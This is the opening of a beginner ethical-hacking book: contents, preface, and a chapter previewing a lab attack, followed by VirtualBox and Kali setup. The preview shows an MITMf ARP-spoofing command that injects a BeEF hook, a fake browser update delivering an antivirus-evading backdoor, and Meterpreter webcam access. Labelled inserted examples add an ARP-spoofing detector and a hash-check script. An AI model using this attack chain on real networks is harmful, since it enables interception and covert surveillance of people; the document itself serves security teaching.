This book starts with the basics of ethical hacking, how to practice hacking safely and legally, and how to install and interact with Kali Linux and the Linux terminal. You will explore network hacking, where you will see how to test the security of wired and wireless networks. You’ll also learn how to crack the password for any Wi-Fi network (whether it uses WEP, WPA, or WPA2) and spy on the connected devices.
Moving on, you will discover how to gain access to remote computer systems using client-side and server-side attacks. You will also get the hang of post-exploitation techniques, including remotely controlling and interacting with the systems that you compromised. Towards the end of the book, you will be able to pick up web application hacking techniques. You'll see how to discover, exploit, and prevent a number of website vulnerabilities, such as XSS and SQL injections.
The attacks covered are practical techniques that work against real systems and are purely for educational purposes. At the end of each section, you will learn how to detect, prevent, and secure systems from these attacks.
Page count: 524
Year of publication: 2018
Copyright © 2018 Packt Publishing
All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.
Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.
Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.
Commissioning Editor: Vijin Boricha
Acquisition Editor: Namrata Patil
Content Development Editor: Sneha Gonsalves
Technical Editor: Nilesh Sawakhande
Copy Editor: Safis Editing
Project Coordinator: Namrata Swetta
Proofreader: Safis Editing
Indexer: Tejal Daruwale Soni
Graphics: Jisha Chirayil
Production Coordinator: Aparna Bhagat
First published: July 2018
Production reference: 1310718
Published by Packt Publishing Ltd. Livery Place 35 Livery Street Birmingham B3 2PB, UK.
ISBN 978-1-78862-205-9
www.packtpub.com
Mapt is an online digital library that gives you full access to over 5,000 books and videos, as well as industry leading tools to help you plan your personal development and advance your career. For more information, please visit our website.
Spend less time learning and more time coding with practical eBooks and Videos from over 4,000 industry professionals
Improve your learning with Skill Plans built especially for you
Get a free eBook or video every month
Mapt is fully searchable
Copy and paste, print, and bookmark content
Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at www.PacktPub.com and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at [email protected] for more details.
At www.PacktPub.com, you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on Packt books and eBooks.
Zaid Sabih is an ethical hacker, a computer scientist, and the founder and CTO of zSecurity. He has good experience in ethical hacking; he started working as a pentester with iSecurity. In 2013, he started teaching his first network hacking course; this course received amazing feedback, leading him to publish a number of online ethical hacking courses, each focusing on a specific topic, all of which are dominating the ethical hacking topic on Udemy. Now Zaid has more than 300,000 students on Udemy and other teaching platforms, such as StackSocial, StackSkills, and zSecurity.
If you're interested in becoming an author for Packt, please visit authors.packtpub.com and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.
Title Page
Copyright and Credits
Learn Ethical Hacking from Scratch
Dedication
Packt Upsell
Why subscribe?
PacktPub.com
Contributors
About the author
Packt is searching for authors like you
Preface
Who this book is for
What this book covers
To get the most out of this book
Download the example code files
Conventions used
Get in touch
Reviews
Introduction
What's in this book?
Preparation
Penetration testing
Network penetration testing
Gaining access
Post exploitation
Website penetration testing
Protecting your system
What is hacking?
Why should we learn about hacking?
A glimpse of hacking
Browser exploitation framework
Accessing the target computer's webcam
Summary
Setting Up a Lab
Lab overview
VirtualBox
Installation of VirtualBox
Installing Kali Linux
Installing Metasploitable
Installing Windows
Creating and using snapshots
Summary
Linux Basics
Overview of Kali Linux
Status bar icons
Connecting the wireless card
Linux commands
Commands
The ls command
The man command
The help command
The Tab button
Updating resources
Summary
Network Penetration Testing
What is a network?
Network basics
Connecting to a wireless adapter
MAC addresses
Wireless modes – managed and monitor
Enabling monitor mode manually
Enabling monitor mode using airmon-ng
Summary
Pre-Connection Attacks
Packet sniffing basics
Targeted packet sniffing
Deauthentication attack
What is a fake access point?
Creating fake access points with the MANA Toolkit
Summary
Network Penetration Testing - Gaining Access
WEP theory
Basic WEP cracking
Fake authentication attack
ARP request replay
WPA introduction
WPS cracking
Handshake theory
Capturing the handshake
Creating a wordlist
Wordlist cracking
Securing network from attacks
Summary
Post-Connection Attacks
Post-connection attacks
The netdiscover tool
The AutoScan tool
Zenmap
Summary
Man-in-the-Middle Attacks
Man-in-the-middle attacks
ARP spoofing using arpspoof
ARP spoofing using MITMf
Bypassing HTTPS
Session hijacking
DNS spoofing
MITMf screenshot keylogger
MITMf code injection
MITMf against a real network
Wireshark
Wireshark basics
Wireshark filters
Summary
Network Penetration Testing, Detection, and Security
Detecting ARP poisoning
Detecting suspicious behavior
Summary
Gaining Access to Computer Devices
Introduction to gaining access
Server side
Client side
Post-exploitation
Server-side attacks
Server-side attack basics
Server-side attacks – Metasploit basics
Metasploit remote code execution
Summary
Scanning Vulnerabilities Using Tools
Installing MSFC
MSFC scan
MSFC analysis
Installing Nexpose
Running Nexpose
Nexpose analysis
Summary
Client-Side Attacks
Client-side attacks
Installing Veil
Payloads overview
Generating a Veil backdoor
Listening for connections
Testing the backdoor
Fake bdm1 updates
Client-side attacks using the bdm2 BDFProxy
Protection against delivery methods
Summary
Client-Side Attacks - Social Engineering
Client-side attacks using social engineering
Maltego overview
Social engineering – linking accounts
Social engineering – Twitter
Social engineering – emails
Social engineering – summary
Downloading and executing AutoIt
Changing the icon and compiling the payload
Changing extensions
Client-side attacks – TDM email spoofing
Summary
Attack and Detect Trojans with BeEF
The BeEF tool
BeEF – hook using a MITMf
BeEF – basic commands
BeEF – Pretty Theft
BeEF – Meterpreter 1
Detecting Trojans manually
Detecting Trojans using a sandbox
Summary
Attacks Outside the Local Network
Port forwarding
External backdoors
IP forwarding
External BeEF
Summary
Post Exploitation
An introduction to post exploitation
Meterpreter basics
Filesystem commands
Maintaining access by using simple methods
Maintaining access by using advanced methods
Keylogging
An introduction to pivoting
Pivoting autoroutes
Summary
Website Penetration Testing
What is a website?
Attacking a website
Summary
Website Pentesting - Information Gathering
Information gathering using tools
The Whois Lookup
Netcraft
Robtex
Websites on the same server
Information gathering from target websites
Finding subdomains
Information gathering using files
Analyzing file results
Summary
File Upload, Code Execution, and File Inclusion Vulnerabilities
File upload vulnerabilities
Getting started with Weevely
Code execution vulnerabilities
Local file inclusion vulnerabilities
Remote file inclusion using Metasploitable
Basic mitigation
Summary
SQL Injection Vulnerabilities
What is SQL?
The dangers of SQLi
Discovering SQLi
SQLi authorization bypass
Discovering an SQLi using the GET method
Basic SELECT statements
Discovering tables
Reading columns and their data
Reading and writing files on the server
The sqlmap tool
Preventing SQLi
Summary
Cross-Site Scripting Vulnerabilities
Introduction to XSS
Reflected XSS
Stored XSS
XSS BeEF exploitation
XSS protection
Summary
Discovering Vulnerabilities Automatically Using OWASP ZAP
OWASP ZAP start
OWASP ZAP results
Summary
Other Books You May Enjoy
Leave a review - let other readers know what you think
This book is intended for anyone who wants to learn how to perform hacking/penetration testing. It is designed to start from scratch, assuming no prior knowledge, and takes you all the way to a strong intermediate level in the subject. The book is highly practical but it will not neglect the theory. It starts with some basic terminology; then you'll learn how to set up a penetration-testing lab and install all the necessary software. The remainder of the book is divided into a number of sections, each covering a penetration testing field—from networks, servers, and websites to client-side attacks and social engineering. In each of these sections, you'll learn how a target system works, the weaknesses in the system, how to exploit those weaknesses and hack the system, and how to secure the system from the discussed weaknesses. By the end of the book, you'll have a strong base and a good understanding of hacking/penetration testing, so you'll be able to combine the techniques shown and tailor them to suit different scenarios.
This book starts from scratch, assuming the reader has no prior knowledge of hacking/penetration testing. Therefore, it is for anybody who is interested in learning how to hack or test the security of systems like real hackers and secure them like security experts.
Chapter 1, Introduction, discusses the concept of ethical hacking and also covers basic information about the different fields of penetration testing.
Chapter 2, Setting Up a Lab, looks at setting up a lab and installing all the software that is needed in order to get started with penetration testing. This matters because, throughout this book, we will launch attacks only against a virtual environment created on our own system.
Chapter 3, Linux Basics, walks you through the Kali Linux environment so that you become familiar with the virtual framework. We will be learning some basic commands, as well as looking at the installation and updating of software.
Chapter 4, Network Penetration Testing, will cover the basics of what we mean by a network and will examine the various types of network. Also, we will discuss a few terminologies related to networks.
Chapter 5, Pre-Connection Attacks, will discuss wireless cards. Then we will learn how to gather information about networks and computers, and we'll learn how to launch attacks, such as controlling connections without having the credentials of the target. We will learn how to capture information about victims by creating fake access points to which the targets will be connected.
Chapter 6, Network Penetration Testing – Gaining Access, demonstrates how we can crack the key and gain access to our target by using all the information that we have gathered about the victim. This chapter will also teach you how to crack WEP/WPA/WPA2 encryption.
Chapter 7, Post-Connection Attacks, will teach you how to gather information about the network so that we can use it to perform further powerful attacks. To do so, we will be using various tools. Each of those tools has various advantages that we can exploit to find out more useful information about the victims.
Chapter 8, Man-in-the-Middle Attacks, will be about launching various man-in-the-middle attacks, such as ARP spoofing, session hijacking, and DNS spoofing. We will also learn about the Wireshark tool, which is incredibly effective for analyzing the packets flowing in and out of the victim's system.
Chapter 9, Network Penetration Testing, Detection, and Security, discusses ARP poisoning—we will discuss how to perform the attack, how to detect it, and also how to prevent and secure our systems from this attack. We will also be learning about how Wireshark can help us with all those endeavors.
Chapter 10, Gaining Access to Computer Devices, teaches us how to gain full control over any computer system. This chapter will cover the first approach, which is server-side attacks. In this chapter, we will learn how to gain full access to the target system without user intervention. We will even be gathering information about the operating system of the victim, as well as any open ports and installed services that might help us identify the weaknesses and vulnerabilities of that system. Then we will be exploiting the vulnerabilities to control the target.
Chapter 11, Scanning Vulnerabilities Using Tools, will show you how to use the built-in Metasploit framework to help us to scan the network and target so that we can gain information about them.
Chapter 12, Client-Side Attacks, looks at the second approach that can be used to gain access to the victim's system. Here, we will be making use of packets that move in and out of the target system to launch attacks. To track packets, we will learn about a tool called Veil, which even helps us generate backdoors. We'll also look at securing our system.
Chapter 13, Client-Side Attacks – Social Engineering, teaches you how to access the victim's systems when vulnerabilities are not apparent. In such cases, our only solution is interacting with the user, and that is where social engineering comes into play. We will be using various techniques to get the victim to install a backdoor to their device. To achieve this, we will be creating fake updates and backdooring downloaded files on the fly.
Chapter 14, Attacking and Detecting Trojans with BeEF, teaches us how to use the BeEF tool. We will learn some basic commands with it, and we'll use it to detect Trojans.
Chapter 15, Attacks Outside the Local Network, demonstrates the attacks that we will be launching on other networks. We will be learning about the concept of IP forwarding, and we'll also look at using external backdoors to launch these attacks.
Chapter 16, Post Exploitation, teaches you how to interact with a system that you've managed to break into. We will study how to maintain our access to the system (and filesystem) that we have hacked. We will also learn how to use the target computer to hack or spy on the other computers in the network.
Chapter 17, Website Penetration Testing, discusses how websites work, and we will even look at how the backend is exploited.
Chapter 18, Website Pentesting – Information Gathering, explains how we can gather information about our target, specifically website owners or servers hosting those websites. We can do this using commands and tools such as Netcraft. We will also be covering the concept of the subdomain.
Chapter 19, File Upload, Code Execution, and File Inclusion Vulnerabilities, deals with various vulnerabilities and also demonstrates, via examples, how to exploit them.
Chapter 20, SQL Injection Vulnerabilities, covers one of the most dangerous vulnerabilities, which is SQL injections. Here we will also learn about how we can detect such vulnerabilities and secure our systems from them.
Chapter 21, Cross-Site Scripting Vulnerabilities, covers cross-site scripting. Here we will learn about everything from launching attacks to securing your systems from those attacks. Furthermore, we'll also find out how we can detect those threats in our system.
Chapter 22, Discovering Vulnerabilities Automatically Using OWASP ZAP, teaches you how to use a tool called OWASP ZAP, which helps detect risks. It generates results of various scans, and we'll be analyzing those results in this chapter.
To get the most out of this book, all you need are basic IT skills and a wireless adapter (for the Wi-Fi-cracking section only). That adapter can be anything as long as it has an Atheros chipset (such as ALFA AWUS036NHA).
You can download the example code files for this book from your account at www.packtpub.com. If you purchased this book elsewhere, you can visit www.packtpub.com/support and register to have the files emailed directly to you.
You can download the code files by following these steps:
1. Log in or register at www.packtpub.com.
2. Select the SUPPORT tab.
3. Click on Code Downloads & Errata.
4. Enter the name of the book in the Search box and follow the onscreen instructions.
Once the file is downloaded, please make sure that you unzip or extract the folder using the latest version of:
WinRAR/7-Zip for Windows
Zipeg/iZip/UnRarX for Mac
7-Zip/PeaZip for Linux
The code bundle for the book is also hosted on GitHub at https://github.com/PacktPublishing/Learn-Ethical-Hacking-from-Scratch. In case there's an update to the code, it will be updated on the existing GitHub repository.
We also have other code bundles from our rich catalog of books and videos available at https://github.com/PacktPublishing/. Check them out!
There are a number of text conventions used throughout this book.
CodeInText: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: "We will go into the Metasploitable directory and select the .vmdk file"
A block of code is set as follows:
html, body, #map { height: 100%; margin: 0; padding: 0}
Any command-line input or output is written as follows:
-i eth0 -r 10.0.2.1/24
Bold: Indicates a new term, an important word, or words that you see onscreen. For example, words in menus or dialog boxes appear in the text like this. Here is an example: "If we go to Files | Downloads, we will see the file."
Feedback from our readers is always welcome.
General feedback: Email [email protected] and mention the book title in the subject of your message. If you have questions about any aspect of this book, please email us at [email protected].
Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packtpub.com/submit-errata, selecting your book, clicking on the Errata Submission Form link, and entering the details.
Piracy: If you come across any illegal copies of our works in any form on the Internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material.
If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.
Please leave a review. Once you have read and used this book, why not leave a review on the site that you purchased it from? Potential readers can then see and use your unbiased opinion to make purchase decisions, we at Packt can understand what you think about our products, and our authors can see your feedback on their book. Thank you!
For more information about Packt, please visit packtpub.com.
Primarily, this chapter will provide a brief overview of the topics that will be covered throughout this book. It will cover all of the aspects associated with hacking, from how to perform hacking to protecting your system from being hacked. Later in the chapter, we will discuss the concept of hacking, discussing three types of hackers: white hat hackers, black hat hackers, and grey hat hackers. Toward the end of the chapter, we will illustrate some real-time hacking applications.
This chapter will address the following questions:
What's in this book?
What is hacking?
Why should we learn about hacking?
A glimpse of hacking
In this book, you will learn how to become an ethical hacker from scratch. We'll assume that you have no experience in ethical hacking, and, by the end of the book, you will be at an intermediate (to high) level.
Here is a quick overview of what will be covered in this book:
Preparation
Penetration testing
Protecting your own system
In the first part of this book, you will learn how to create your own lab, so that you can practice ethical hacking on your own computer. You will also learn the installation of Linux systems and how to interact with them, as well as how to set up other systems to try to hack into them.
In this part of the book, we will cover the most important penetration testing fields. In each of these sections, we will first illustrate how a particular system works, and will then test the security of that system. In the following sections, we will introduce the types of penetration testing that will be seen in this book.
In network penetration testing, the first things that we will learn are how networks work and how devices interact with each other.
First, we will learn more about the networks around us; we will gradually proceed by setting up a fake access point and luring people into connecting to networks so that we can capture data that is sent or received through them. We will then learn how to get the password for any Wi-Fi network, whether it uses WEP, WPA, or WPA2 encryption.
We will also go over a large number of powerful attacks that will allow us to gain access to any account that is accessed from any computer in a network. We will be able to capture usernames, passwords, images, and pictures that computers on a network send or receive.
In this part of the chapter, we will learn how to gain access to computer systems. There are two methods to hack a computer:
Server-side attacks
Client-side attacks
When learning about server-side attacks, you will see how to discover weaknesses in the programs installed on the target computer, and how to use those weaknesses to gain full access to the computer.
In the client-side attacks, you're going to learn how to use social engineering to hack into the target, you'll learn how to create undetectable backdoors, backdoors that look like images and pictures, and so on. We will also learn how to gain access to any computer if that computer exists in our network by using fake updates or by using fake downloads.
In this section, we look at post exploitation, learning how to control the devices that we hacked. So, we're going to see how to open a system's webcam, manage its filesystem, and download or upload files to it. We will also learn how to capture all of the keystrokes that the person enters on their keyboard, or even use that computer as a pivot to hack into other computers.
In the final sections, which will be about website penetration testing, we will learn how to gather very comprehensive information about websites, including how to discover, exploit, and mitigate a large number of serious vulnerabilities.
Finally, we will learn how to protect ourselves (and our systems) from the attacks discussed in the preceding sections.
Through hacking, you can do anything that you're not supposed to do (or allowed to do). For example, you can view information that you don't have permission to see or use a computer that you're not allowed to use. There are many different types of hacking, such as email hacking, computer hacking, server hacking, and web application hacking.
There are three different types of hackers:
Black hat hackers: Black hat hackers hack into systems for their own benefit; these are the ones that steal money or break systems purely to benefit themselves.
White hat hackers: White hat hackers try to secure systems; they might use the same methods as black hat hackers, but they only do it on systems for which they have permission to do so, in order to see if the systems are vulnerable—they hack them in order to fix them.
Grey hat hackers: There are also grey hat hackers, which are a mix of both; they will test any systems that they want to test, even if they don't have permission to hack them. Once they do hack into things, they don't break anything or steal any money; they don't cause damage. They might even tell the administrators how to fix it.
In this book, we will be white hat hackers. This book is only about teaching hacking for educational purposes. It is for people who want to be able to secure their networks, and who want to work as pen testers to secure computer systems.
Hacking is an established field—there are many job opportunities within it, it is happening every day, and it involves a growing demand for protection. We all heard about the Sony hack, when PlayStation was down for a considerable amount of time. Companies such as Sony are actually hiring people to try to hack into them. You're going to learn how to hack into networks and systems so that you can secure them from black hat hackers.
Not so long ago, someone found a way to brute-force the password reset key for Facebook on its mobile website, because Facebook didn't check the number of times that you entered an incorrect PIN. Once the person had done this, they told Facebook about it, and they were rewarded with $20,000, because Facebook has a bug bounty program. At the moment, many websites and companies have bug bounties – they are asking people to try to hack them, and they will pay a certain amount of money if a hack is successful, depending on how dangerous the exploit is.
In the coming sections, we are going to learn how to install the operating systems and programs needed for hacking. We will then learn some basics about hacking, and how to use the operating systems involved. Before we start, I'd like to give you the gist of what you're going to be able to do by the end of this book. In this section, we are going to go through an example of hacking a Windows computer from a Linux machine.
Don't worry about how we installed these machines or how to run these commands; right now, this is just an example. In the future, we're going to break this into steps, and you will see exactly how to run the attack. You will also learn about how the attack works, and how to protect yourself from such an attack.
Now, we are going to use a program called Browser Exploitation Framework (BeEF):
We're going to launch BeEF XSS Framework. It uses JavaScript code to hook a target computer; once a computer is hooked, we'll be able to run a number of commands. Following is a screenshot of how it looks:
To run the commands, we will use a man-in-the-middle attack to automatically inject the hook code for BeEF. We will use a tool called MITMf to perform an ARP spoofing attack. We will give it the network interface, gateway, and target IP address, which is the address of the Windows machine.
Next, we will tell MITMf that we want it to inject a JavaScript URL, and give it the location where the hook is stored. The code will look something like this:
mitmf --arp --spoof -i eth0 --gateway 10.0.2.1 --target 10.0.2.5 --inject --js-url http://10.0.2.15:3000/hook.js
Once this is done, hit Enter, and it will run successfully. Its output is shown here:
This looks very complicated; we don't know where we got the options from, so it probably all looks very confusing in the preceding screenshot. Again, don't worry; we will discuss it in detail later on, and it will become easy for you. Right now, all we need to understand is that this program is going to inject the hook code; the code allows BeEF to hack into the computer, into the browser used by the target person, and the code can run without the person even knowing.
Now, go to the Windows machine and run the web browser. We're just going to go to any website, such as Google or Bing.
If you go back to the Kali machine, you'll see that we have the IP address of the target person under Hooked Browsers, and, if you click on the Commands tab, you'll see a large number of categories, with commands that you can run on the target computer. These are shown in the following screenshot:
Let's display a fake notification bar to the target telling them there's a new update, so click on Social Engineering | Fake Notification Bar (Firefox), as shown in the following screenshot:
This is going to show the target person that there's a new update, and, once they have installed the update, we can hack into their computer. Now, let's configure the fake notification bar to install a backdoor once the user clicks on it.
We have a ready-made backdoor that's not detectable by antivirus programs (you will see how to do that in upcoming chapters). We will store that backdoor, and call it update.exe.
Next, we will click on Execute. Before we run the update, we will have to listen for incoming connections from the target computer, which will arrive once the victim tries to run the update. Now, if we hit Execute on the fake notification bar command, the bar will be displayed in the target's browser, as shown in the following screenshot:
In the preceding screenshot, Firefox is showing that there is a critical update, and you need to click on Install plug-in to install that update. Once you have clicked on it, and you can see that it has downloaded an update file, save it, and then run the update.
If we go back to the Kali machine, we'll see that we managed to get a reverse session from the Windows machine. So, let's interact with that computer; we will basically have full control over it:
Now, let's see how to access the target computer's webcam.
To access the webcam, we are going to use a plugin that comes with Meterpreter; we will use the webcam_stream command.
When we hit Enter, we will be able to turn the webcam on. It is a webcam that's actually attached to the Windows machine; we have hacked into the Windows machine, and we can do anything we want on it. Again, this is just an example of one attack that we're going to use. We're going to perform many more attacks like this, and all of them are going to allow us to gain full control over the target system.
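The whole chain above rests on the ARP spoofing step: MITMf answers ARP for the gateway (10.0.2.1) and the target (10.0.2.5) with the attacker's MAC so that traffic can be rewritten with the hook. The following is an added example, not code from the book, that shows the two ARP-level signatures a defender on the same network can check for: one IP address seen with more than one MAC over time, and one MAC claiming the gateway's IP plus other IPs. The MAC addresses and the `arp -a` sample are constructed; the attacker address 10.0.2.15 is taken from the hook URL in the MITMf command above.

```python
"""Detect ARP spoofing of the kind used in the walkthrough (added example).

Two signatures are checked:
  1. An IP address answered by more than one MAC (what Wireshark reports as
     "duplicate use of IP address detected").
  2. A single MAC that claims the gateway IP and at least one other IP, which is
     what a man-in-the-middle between gateway and victim looks like in an ARP cache.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    sender_ip: str
    sender_mac: str


GATEWAY_IP = "10.0.2.1"  # gateway from the MITMf command in the text

# Constructed sample of observed ARP replies (MACs are placeholders):
# genuine replies from gateway and victim, then the attacker (10.0.2.15)
# poisoning both sides with its own MAC.
SAMPLE_REPLIES = [
    ArpReply("10.0.2.1", "52:54:00:12:35:00"),   # real gateway
    ArpReply("10.0.2.5", "08:00:27:aa:bb:05"),   # real Windows victim
    ArpReply("10.0.2.15", "08:00:27:cc:dd:15"),  # attacker answering for itself
    ArpReply("10.0.2.1", "08:00:27:cc:dd:15"),   # gateway IP now bound to attacker MAC
    ArpReply("10.0.2.5", "08:00:27:cc:dd:15"),   # victim IP now bound to attacker MAC
]

# Constructed `arp -a` output (Linux format) as the victim would see it mid-attack.
SAMPLE_ARP_A = """\
_gateway (10.0.2.1) at 08:00:27:cc:dd:15 [ether] on eth0
? (10.0.2.15) at 08:00:27:cc:dd:15 [ether] on eth0
? (10.0.2.4) at 08:00:27:11:22:04 [ether] on eth0
"""

_ARP_LINE = re.compile(r"\((?P<ip>\d+\.\d+\.\d+\.\d+)\)\s+at\s+(?P<mac>[0-9a-fA-F:]{17})")


def parse_arp_table(text):
    """Turn `arp -a` output into ArpReply records (one per cache entry)."""
    return [ArpReply(m.group("ip"), m.group("mac")) for m in _ARP_LINE.finditer(text)]


def find_ip_conflicts(replies):
    """IPs seen with more than one MAC; maps ip -> sorted list of MACs."""
    ip_to_macs = defaultdict(set)
    for r in replies:
        ip_to_macs[r.sender_ip].add(r.sender_mac.lower())
    return {ip: sorted(macs) for ip, macs in ip_to_macs.items() if len(macs) > 1}


def find_macs_claiming_gateway(replies, gateway_ip=GATEWAY_IP):
    """MACs that claim the gateway IP and at least one other IP; maps mac -> sorted IPs."""
    mac_to_ips = defaultdict(set)
    for r in replies:
        mac_to_ips[r.sender_mac.lower()].add(r.sender_ip)
    return {mac: sorted(ips) for mac, ips in mac_to_ips.items()
            if gateway_ip in ips and len(ips) > 1}


def assess(replies, gateway_ip=GATEWAY_IP):
    """Combine both checks into one verdict with the supporting evidence."""
    conflicts = find_ip_conflicts(replies)
    suspects = find_macs_claiming_gateway(replies, gateway_ip)
    return {
        "ip_conflicts": conflicts,
        "suspect_macs": suspects,
        "arp_spoofing_suspected": bool(conflicts or suspects),
    }


if __name__ == "__main__":
    print("from captured replies:", assess(SAMPLE_REPLIES))
    print("from arp -a snapshot:", assess(parse_arp_table(SAMPLE_ARP_A)))
```

A single cache snapshot cannot show the first signature (it holds one MAC per IP), so the second check is the one to run against `arp -a`; watching replies over time is needed for the first.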
In this chapter, we looked at some brief descriptions of the topics that will be thoroughly covered in this book. We discussed using a Linux machine to hack a computer with the Windows operating system. Then, we learned about the concept of hacking through the use of real-time examples. The different types of hackers were discussed. Finally, we saw various applications involved in hacking.
In the following chapter, we will set up a virtual environment to perform various penetration tests. We will also install Kali Linux, Windows, and Metasploitable machines.
In the previous chapter, we learned the concept of hacking. In this chapter, we are going to learn how to set up a virtual environment, so that we can later perform penetration tests on it. In this chapter, we will cover the concept of virtual machines, and will also perform its installation steps. Later in the chapter, we will learn how to install Kali Linux, and the two victim machines on VirtualBox: Windows and the Metasploitable machine. We will also discuss what each of these machines does, and why we are going to use them. Toward the end of the chapter, we will see the concept of snapshots, and how to implement them.
The following topics will be covered in this chapter:
Lab overview
Installing Kali Linux
Installing Metasploitable
Installing Windows
Creating snapshots and using snapshots
Since this book is highly practical, we will need a lab, a place where we can learn and perform attacks. To create this, we're going to use a program called VirtualBox.
VirtualBox is a program that allows us to install machines, just like normal computers, inside our own machine. We will have one computer, and we will install other computers inside it as virtual machines. These are very important for penetration testing; we're going to use them a lot in order to set up a lab. It's important to note that a virtual machine behaves like a completely separate, working machine: we lose nothing by installing an operating system as a virtual machine, and it performs just as it would installed on a separate laptop. The one thing a virtual machine does not get is direct use of the host's built-in wireless card, which is why, later in the book, a USB wireless adapter is passed through to Kali for wireless attacks. Basically, instead of having four or five computers or laptops around us to hack into, we're going to install them as virtual machines inside our own machine. This might seem a bit vague now, but once we get further into the chapter, the way VirtualBox works will become clearer.
Basically, we are going to have three computers inside our main computer. We will have the following three machines in our lab:
Attacker machine: Kali Linux
Victim 1: Metasploitable
Victim 2: Windows
For example, if our main computer runs macOS, we leave it as it is and do nothing to it. Inside it we have a machine that will be the attacker, running Kali Linux; we will learn more about Kali Linux later in this chapter.
We will also have two victims:
A victim that runs Windows.
A victim that runs an operating system called Metasploitable.
So, we're going to have our own machine, and then three separate machines inside it. This will be possible by using VirtualBox.
When downloading VirtualBox, grab the version that's compatible with your host operating system; there are builds for Windows, macOS, and Linux.
Double-click the installer and accept the defaults (Next, Next, Next), and it's installed. The following is a screenshot of VirtualBox once installed; as we can see, there are no machines yet in the list on the left-hand side of the window:
Throughout this book, we're going to use a number of penetration testing tools. You can go ahead and install each of these tools manually, or you can do what most pen testers, including myself, do—save time and effort by using an operating system designed for hacking. We're going to use an operating system called Kali Linux, a flavor of Linux based on Debian. It comes with all of the programs and applications that we need to use, preinstalled and preconfigured. This means that we can just install the operating system and start to learn hacking.
There are two options for installing Kali: as a virtual machine inside your current operating system, or directly on the hardware as the main operating system. Throughout this book, we are going to use it as a virtual machine. It behaves the same as it would as the main operating system, but it is isolated from the host, running inside VirtualBox, so if we break it or mess things up, it is very easy to fix by going back to a snapshot or an earlier configuration. We lose no functionality by running it this way, which is why we always use it like this.
The steps for installing Kali Linux are as follows:
1. Download and install the VirtualBox version for your computer.
2. After setting up VirtualBox, download Kali Linux, available at https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-hyperv-image-download/.
3. Scroll down, making sure to click on the Kali Linux VirtualBox Images, not the VMware ones; then, download the version of Kali that's compatible with your system. If you have a 64-bit computer, download the 64-bit image, and if you have a 32-bit computer, download the 32-bit image.
4. After downloading it, you should get a file with a .ova extension; that is, the image name followed by .ova, as shown here:
5. To install this in VirtualBox, all we have to do is double-click on the file. A window will open that allows you to import the virtual machine. We're going to keep everything as it is for now and just click on the Import button.
That's it; the virtual machine is ready to be used:
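One check worth doing before importing any downloaded image (the Kali .ova here, and later the Metasploitable and Windows images) is to compare its SHA256 with the value published on the download page, so that a corrupted or tampered image never makes it into the lab. The script below is an added example, not code from the book; the image file name in the usage line is an assumption, and the expected hash must be copied from the download site itself, not from anywhere else:

```shell
#!/bin/sh
# Added example (not from the book): verify the SHA256 of a downloaded VM
# image against the value published on the download page before importing it.
# Usage: sh verify_image.sh <image.ova> <sha256-from-download-page>
# The file name in the usage line is an assumption; use your own download.

# Print the SHA256 of a file, using whichever tool the host has
# (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | cut -d' ' -f1
    else
        echo "no sha256 tool found" >&2
        return 2
    fi
}

# Compare the file's hash with the published one (case-insensitive).
# Returns 0 on match, 1 on mismatch, 2 if the file cannot be hashed.
verify_image() {
    file=$1
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ -f "$file" ] || { echo "no such file: $file" >&2; return 2; }
    actual=$(sha256_of "$file") || return 2
    if [ "$actual" = "$expected" ]; then
        echo "OK: $file matches $expected"
        return 0
    fi
    echo "MISMATCH: $file" >&2
    echo "  expected $expected" >&2
    echo "  got      $actual" >&2
    return 1
}

# Only run when called with both arguments, so the functions can also be
# sourced from another script.
if [ "$#" -eq 2 ]; then
    verify_image "$1" "$2"
fi
```

A mismatch means the download is incomplete or is not the file the vendor published; delete it and download again rather than importing it.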
Before we start, we will look at how to modify some of the settings. Click on the Kali-Linux entry on the left side of the window, then click on Settings. The first thing to do here is go to System and modify the amount of RAM the machine has. Depending on how much RAM you have on your computer, you can give it 2 GB, but 1 GB is enough for Kali. Usually, I leave it at 2 GB, because I have 16 GB of RAM.
Also, when you click on the Processor tab, you'll see that, by default, two processors are assigned to it. Again, I have 8 CPUs, so 2 is not going to put too much pressure on my computer; but 1 CPU is also enough for Kali.
Now, we're going to go to the Network settings and set the adapter to use a NAT Network. Note that this is NAT Network, not the plain NAT mode listed just above it: plain NAT puts each virtual machine on its own private network, so the machines cannot see each other. Sometimes, when we select NAT Network, no network name appears in the Name box, because no NAT Network has been created yet. In VirtualBox 5 and 6 you create one under File | Preferences | Network | NAT Networks; the video at https://www.youtube.com/watch?v=y0PMFg-oAEs also walks through creating one. This setting creates a virtual network with its own built-in router and DHCP server, and all of the virtual machines become clients of that network. Their traffic to the internet is forwarded out through the host machine's connection, and at the same time all of the virtual machines sit on the same virtual network, so they can communicate with each other. This is very handy: we can use one of them to hack into another, test network attacks, and much more.
None of this uses your wireless adapter or wireless card directly; VirtualBox creates a virtual Ethernet network, so as far as the virtual machines are concerned, they're connected to a network through an Ethernet cable.
